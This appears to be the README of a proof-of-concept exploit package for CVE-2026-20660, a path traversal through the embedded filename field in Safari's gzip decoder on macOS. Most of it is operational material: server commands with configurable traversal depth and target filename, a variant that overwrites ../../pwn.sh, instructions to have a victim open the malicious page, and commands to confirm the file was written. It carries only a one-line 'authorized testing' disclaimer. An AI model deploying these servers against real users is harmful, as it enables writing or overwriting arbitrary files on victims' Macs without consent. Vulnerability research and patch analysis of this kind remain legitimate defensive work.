
Standalone PoC exploit for CVE-2026-20660: path traversal in Safari's gzip decoder. Server delivers malicious gzip to write arbitrary files on vulnerable macOS.
This folder packages a standalone proof-of-concept for:
NSGZipDecoder path traversal via gzip FNAMEserver.py: Main PoC server with configurable traversal depth and target nameserver_overwrite.py: Focused variant writing ../../pwn.shREADME.md: Reproduction notes and operation logPatch diff shows -[NSGZipDecoder filenameWithOriginalFilename:] changed behavior:
lastPathComponent before returning.This blocks directory components such as ../ and absolute paths in FNAME.
The HTTP filename can be clean and still exploit succeeds.
Content-Disposition filename: clean (example: report.gz)../../proof.txt)Safari-side sanitization primarily applies to HTTP-layer names, not the embedded gzip FNAME consumed by NSGZipDecoder in the vulnerable flow.
From repo root:
python3 exploit/cve-2026-20660/server.py --port 8888 --depth 2
Open in vulnerable Safari:
http://<server-ip>:8888/
Click Trigger depth=2.
After triggering, verify write result on target machine:
ls -la ~/cve-2026-20660-proof.txt
cat ~/cve-2026-20660-proof.txt
For overwrite variant:
python3 exploit/cve-2026-20660/server_overwrite.py --port 9999
Then open:
http://<server-ip>:9999/
Check:
ls -la ~/pwn.sh
cat ~/pwn.sh
server.py)--bind, -b: bind address (default 0.0.0.0)--port, -p: listening port (default 8888)--depth, -d: traversal depth (../ repeat count, default 2)--name, -n: target output file nameExamples:
# write to ~/proof.txt when depth matches runtime directory nesting
python3 exploit/cve-2026-20660/server.py -p 8888 -d 2 -n proof.txt
# explicit absolute path test (if resolver permits)
python3 exploit/cve-2026-20660/server.py -p 8888
# then use: /download?depth=0&fname=/tmp/proof.txt
~/Downloads, so depth often needs to be >= 2 to escape into ~/.2, 3, 4) and re-test.Use only in authorized testing environments.
For a more detailed explanation, see: